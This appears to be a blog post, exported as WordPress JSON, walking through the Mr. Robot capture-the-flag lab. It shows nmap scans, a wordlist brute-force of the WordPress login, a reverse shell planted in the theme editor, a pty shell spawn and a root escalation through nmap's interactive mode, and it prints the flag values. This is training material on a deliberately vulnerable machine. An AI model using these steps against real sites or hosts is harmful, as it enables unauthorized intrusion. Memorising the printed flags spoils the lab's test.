{"id":9952,"date":"2023-03-11T17:06:35","date_gmt":"2023-03-11T11:36:35","guid":{"rendered":"https:\/\/reconcybersecurity.com\/?p=9952"},"modified":"2023-04-27T13:33:00","modified_gmt":"2023-04-27T13:33:00","slug":"master-the-art-of-hacking-with-ctf-mr-robot-a-step-by-step-walkthrough-recon-cyber-security-cyber-security","status":"publish","type":"post","link":"https:\/\/reconcybersecurity.com\/blogs\/master-the-art-of-hacking-with-ctf-mr-robot-a-step-by-step-walkthrough-recon-cyber-security-cyber-security\/","title":{"rendered":"Master the Art of Hacking with CTF Mr. Robot: A Step-by-Step Walkthrough | CYBER SECURITY"},"content":{"rendered":"\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"has-black-color has-text-color has-large-font-size\">Introduction<\/p>\n<\/blockquote>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">Participants of the Mr. Robot CTF must prove their expertise in <a href=\"https:\/\/reconcybersecurity.com\/penetration-testing-course\"><strong><mark style=\"background-color:rgba(0, 0, 0, 0);color:#ff0505\" class=\"has-inline-color\">penetration testing<\/mark><\/strong><\/a> by successfully infiltrating a virtual machine and attaining root access. Featuring multiple levels of complexity, this challenge is designed to emulate the cyber security aspects depicted in the popular television series, Mr. Robot.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"has-black-color has-text-color has-large-font-size\"><strong>Understanding the Challenge<\/strong><\/p>\n<\/blockquote>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">Mr. Robot <a href=\"https:\/\/reconcybersecurity.com\/ctf-challenge-course\"><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-pale-cyan-blue-color\">CTF<\/mark><\/strong><\/a> is a vulnerable virtual machine created with security vulnerabilities purposely implemented for exploitation. Its purpose is to find and exploit these weaknesses for full root access. Divided into multiple levels, each requiring distinct aptitudes and resources to surpass, this challenge offers an intriguing and difficult set of objectives.<\/p>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">To kick off the Mr. Robot CTF, downloading the corresponding virtual machine and importing it into your virtualization software, like <a href=\"https:\/\/www.virtualbox.org\/\" target=\"_blank\" rel=\"noopener\"><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-orange-color\">VirtualBox<\/mark><\/strong><\/a> or <a href=\"https:\/\/www.vmware.com\/in.html\" target=\"_blank\" rel=\"noopener\"><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">VMware<\/mark><\/strong><\/a>, is essential. Both <a href=\"https:\/\/tryhackme.com\/room\/mrrobot\" target=\"_blank\" rel=\"noopener\"><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-light-green-cyan-color\">TryHackMe<\/mark><\/strong><\/a> and <a href=\"https:\/\/download.vulnhub.com\/mrrobot\/mrRobot.ova\" target=\"_blank\" rel=\"noopener\"><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-green-cyan-color\">vulnhub<\/mark><\/strong><\/a> platforms are accessible to acquire the virtual machine.<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"has-black-color has-text-color has-large-font-size\">STEPS &gt;&gt;<\/p>\n<\/blockquote>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">We are embarking on the challenge of playing Mr. ROBOT:1 CTF, which requires us to locate the IP address.<\/p>\n\n\n\n<pre class=\"wp-block-code has-black-color has-text-color has-medium-font-size\"><code>sudo nmap -v -sV 192.168.1.*<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/1.png\" alt=\"\" class=\"wp-image-9954\" width=\"721\" height=\"199\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">Examining ports <em>80\/TCP<\/em> and <em>443\/TCP<\/em>, it is apparent they are open.<\/p>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">Let&#8217;s investigate further.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/2-1024x537.png\" alt=\"\" class=\"wp-image-9955\" width=\"800\" height=\"438\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">We are now conducting an Aggressive scan on the IP address <em><strong>192.168.1.17<\/strong><\/em>.<\/p>\n\n\n\n<pre class=\"wp-block-code has-black-color has-text-color has-medium-font-size\"><code>sudo nmap -A -v 192.168.1.17<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/3.png\" alt=\"\" class=\"wp-image-9956\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">Ensure that the <strong>robots.txt<\/strong> file is checked.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/4-1024x534.png\" alt=\"\" class=\"wp-image-9957\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">Now that we are aware of the three keys<\/p>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">let us locate them.<\/p>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">To obtain the first key of three, we need to access the file<strong> key-1-of-3.txt.<\/strong><\/p>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\"><strong><em>&#8220;073403c8a58a1f80d943455fb30724b9&#8221;<\/em><\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/5-1024x330.png\" alt=\"\" class=\"wp-image-9958\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">Using <em>Dirbuster<\/em>, it is possible to filter results.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/6.png\" alt=\"\" class=\"wp-image-9959\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">After downloading the txt file found on <a href=\"https:\/\/reconcybersecurity.com\/\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">http:\/\/192.168.1.17\/fsocity.dic<\/mark><\/a>. Let us begin the process of counting the words within.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/7.png\" alt=\"\" class=\"wp-image-9960\" width=\"334\" height=\"67\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">There is an excessive amount of text that needs to be narrowed down.<\/p>\n\n\n\n<pre class=\"wp-block-code has-black-color has-text-color has-medium-font-size\"><code>cat <strong>fsocity.dic<\/strong><strong>|<\/strong>sort<strong>|<\/strong>uniq<strong>&gt;<\/strong>fs.txt<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/8.png\" alt=\"\" class=\"wp-image-9961\" width=\"373\" height=\"61\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">We are now accessing the <em>wp-admin<\/em> page via <strong>dirb<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/9-1024x519.png\" alt=\"\" class=\"wp-image-9962\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">Utilizing the brute-force method with Burp Suite, I tested different login and password combinations by importing them from an <strong><em>fs.txt file<\/em><\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/10-1024x707.png\" alt=\"\" class=\"wp-image-9963\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">Go to the appearance section, add the reverse shell code, then hit update.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/11.jpg\" alt=\"\" class=\"wp-image-9964\" width=\"753\" height=\"333\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">Activate the shell immediately.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/12-1024x505.png\" alt=\"\" class=\"wp-image-9965\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">And on the Intently listening,<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/13.png\" alt=\"\" class=\"wp-image-9966\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">We have now gained access to the system.<\/p>\n\n\n\n<pre class=\"wp-block-code has-black-color has-text-color has-medium-font-size\"><code>python -c \"import pty;pty.spawn('\/bin\/bash')\"<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/14.png\" alt=\"\" class=\"wp-image-9967\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">With the given commands, you are now able to &#8230;<\/p>\n\n\n\n<pre class=\"wp-block-code has-black-color has-text-color has-medium-font-size\"><code>ls\n\ncd home\n\nls\n\ncd robot\n\nls\n\nls -ls<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/15.png\" alt=\"\" class=\"wp-image-9968\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">To access the file, it is now ready for use.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/17.png\" alt=\"\" class=\"wp-image-9970\" width=\"711\" height=\"74\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">Afterward, ensure the hash is verified.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/16-1024x420.png\" alt=\"\" class=\"wp-image-9971\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">The password belonging to the user &#8220;robot&#8221; is <strong><em>\u201cabcdefghijklmnopqrstuvwxyz\u201d<\/em><\/strong><\/p>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">Transform the user experience by modifying the system.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/18.png\" alt=\"\" class=\"wp-image-9972\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">To move forward, utilize this command.<\/p>\n\n\n\n<pre class=\"wp-block-code has-black-color has-text-color has-medium-font-size\"><code>ls\ncat key-2-of-3.txt\n<\/code><\/pre>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">This is the second key to success. \u201c<strong><em>822c73956184f694993bede3eb39f959<\/em><\/strong>\u201d<\/p>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">Now, examine <strong>Nmap<\/strong> and employ this command.<\/p>\n\n\n\n<pre class=\"wp-block-code has-black-color has-text-color has-medium-font-size\"><code>Cd ..\/..\/\n\nWhich nmap\n\nNmap \u2013help\n\nNmap \u2013interactive\n\n!sh\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/19-1024x520.png\" alt=\"\" class=\"wp-image-9973\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">At this juncture, we have accessed the root; therefore, let us use this command.<\/p>\n\n\n\n<pre class=\"wp-block-code has-black-color has-text-color\"><code>Ls\nCd root\nLs\nCat key-3-of-3.txt\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2023\/03\/20.png\" alt=\"\" class=\"wp-image-9974\"\/><\/figure>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\">The third key is present here. \u201c<strong><em>04787ddef27c3dee1ee161b21670b4e4<\/em><\/strong>\u201d<\/p>\n\n\n\n<p class=\"has-black-color has-text-color has-medium-font-size\"><strong><em>Congratulations!<\/em><\/strong> Your machine has solved the problem.<\/p>\n","protected":false},"excerpt":{"rendered":"Introduction Participants of the Mr. Robot CTF must prove their expertise in penetration testing by successfully infiltrating a&hellip;\n","protected":false},"author":1,"featured_media":10682,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[241,143,10,55,92],"tags":[240,277,286,278,90,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,311,721,722,723,724,725,726,727],"class_list":{"0":"post-9952","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-it-knowledge","8":"category-defend-the-web","9":"category-hacking","10":"category-hacking-tools","11":"category-metasploit","12":"tag-cyber-security","13":"tag-ethical-hacking","14":"tag-hacker","15":"tag-hacking","16":"tag-how-to-use-metasploit","17":"tag-mr-robot-admin-panel","18":"tag-mr-robot-ctf-tryhackme","19":"tag-mr-robot-ctf-answers","20":"tag-mr-robot-ctf-fun-facts","21":"tag-mr-robot-ctf-report","22":"tag-mr-robot-ctf-scene","23":"tag-mr-robot-ctf-solution","24":"tag-mr-robot-ctf-tryhackme-answers","25":"tag-mr-robot-ctf-tryhackme-writeup","26":"tag-mr-robot-ctf-vulnhub","27":"tag-mr-robot-ctf-walkthrough","28":"tag-mr-robot-ctf-writeup","29":"tag-mr-robot-username-and-password","30":"tag-mr-robot-walkthrough-vulnhub","31":"tag-mr-robot-ctf-walkthrough-2021","32":"tag-recon-cyber-security","33":"tag-shockz-offsec-mr-robot-ctf-walkthrough-2021","34":"tag-tryhackme-mr-robot","35":"tag-tryhackme-mr-robot-ctf-aldeid","36":"tag-what-is-key-2-mr-robot","37":"tag-what-is-mr-robot-ctf","38":"tag-what-is-the-default-password-for-vulnhub-mr-robot","39":"tag-what-tools-were-used-in-mr-robot"},"_links":{"self":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/9952","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/comments?post=9952"}],"version-history":[{"count":2,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/9952\/revisions"}],"predecessor-version":[{"id":11114,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/9952\/revisions\/11114"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/media\/10682"}],"wp:attachment":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/media?parent=9952"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/categories?post=9952"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/tags?post=9952"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}